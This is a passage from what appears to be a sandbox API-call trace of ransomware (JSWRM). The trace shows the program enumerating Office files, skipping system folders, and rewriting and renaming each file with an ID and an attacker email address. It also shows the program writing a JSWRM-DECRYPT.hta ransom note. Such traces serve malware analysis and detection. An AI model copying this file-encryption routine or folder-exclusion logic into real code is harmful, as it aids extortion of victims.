lpUsedDefaultChar=0x0) returned 12 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.PL.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.PL.XML", lpUsedDefaultChar=0x0) returned 12 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.PL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.PL.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.PL.XML", lpUsedDefaultChar=0x0) returned 12 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.pl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.132] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.132] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.132] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.137] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.137] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.137] CloseHandle (hObject=0x238) returned 1 [0138.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.pl.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.PL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.pl.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.138] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.SE.XML", cAlternateFileName="YAHOOS~1.XML")) returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2=".") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="..") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="...") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="windows") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="recovery") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="perflogs") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="documents and settings") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="system volume information") returned 1 [0138.138] lstrcmpiW (lpString1="YAHOO.SE.XML", lpString2="msocache") returned 1 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.SE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.SE.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.SE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.SE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.SE.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.SE.XML", lpUsedDefaultChar=0x0) returned 12 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.se.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.140] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.140] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.140] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.141] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.141] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.141] CloseHandle (hObject=0x238) returned 1 [0138.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.se.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.SE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.se.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.142] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.SE.XML", cAlternateFileName="YAHOOS~1.XML")) returned 0 [0138.142] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0138.142] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLPH.DLL", cAlternateFileName="")) returned 1 [0138.142] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2=".") returned 1 [0138.142] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="..") returned 1 [0138.142] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="...") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="windows") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="recovery") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="perflogs") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="documents and settings") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="$RECYCLE.BIN") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="system volume information") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLPH.DLL", lpString2="msocache") returned 1 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPH.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPH.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPH.DLL", lpUsedDefaultChar=0x0) returned 10 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPH.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPH.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPH.DLL", lpUsedDefaultChar=0x0) returned 10 [0138.143] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb438, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLRPC.DLL", cAlternateFileName="")) returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2=".") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="..") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="...") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="windows") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="recovery") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="perflogs") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="documents and settings") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="$RECYCLE.BIN") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="system volume information") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLRPC.DLL", lpString2="msocache") returned 1 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLRPC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLRPC.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLRPC.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLRPC.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLRPC.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLRPC.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.143] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x146b8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLVBS.DLL", cAlternateFileName="")) returned 1 [0138.143] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2=".") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="..") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="...") returned 1 [0138.143] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="windows") returned -1 [0138.143] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="recovery") returned -1 [0138.144] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="perflogs") returned -1 [0138.144] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="documents and settings") returned 1 [0138.144] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0138.144] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="system volume information") returned -1 [0138.144] lstrcmpiW (lpString1="OUTLVBS.DLL", lpString2="msocache") returned 1 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBS.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBS.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLVBS.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBS.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLVBS.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLVBS.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.144] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2981bec, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2981bec, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2a8cc4b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29f6c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OWSSUPP.DLL", cAlternateFileName="")) returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2=".") returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="..") returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="...") returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="windows") returned -1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="recovery") returned -1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="perflogs") returned -1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="documents and settings") returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="system volume information") returned -1 [0138.144] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="msocache") returned 1 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OWSSUPP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OWSSUPP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWSSUPP.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OWSSUPP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0138.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OWSSUPP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWSSUPP.DLL", lpUsedDefaultChar=0x0) returned 11 [0138.144] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc39fa2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc39fa2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PAGESIZE", cAlternateFileName="")) returned 1 [0138.144] lstrcmpiW (lpString1="PAGESIZE", lpString2=".") returned 1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="..") returned 1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="...") returned 1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="windows") returned -1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="recovery") returned -1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="perflogs") returned -1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="documents and settings") returned 1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="$RECYCLE.BIN") returned 1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="system volume information") returned -1 [0138.145] lstrcmpiW (lpString1="PAGESIZE", lpString2="msocache") returned 1 [0138.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\jswrm-decrypt.hta")) returned 0xffffffff [0138.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0138.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.149] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0138.150] CloseHandle (hObject=0x45c) returned 1 [0138.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\jswrm-decrypt.hta")) returned 0x20 [0138.150] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc39fa2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x49019275, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0138.150] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0138.150] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1fc39fa2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x49019275, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.153] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0138.153] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0138.153] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49019275, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x49019275, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x49019275, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0138.153] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0138.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0138.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", 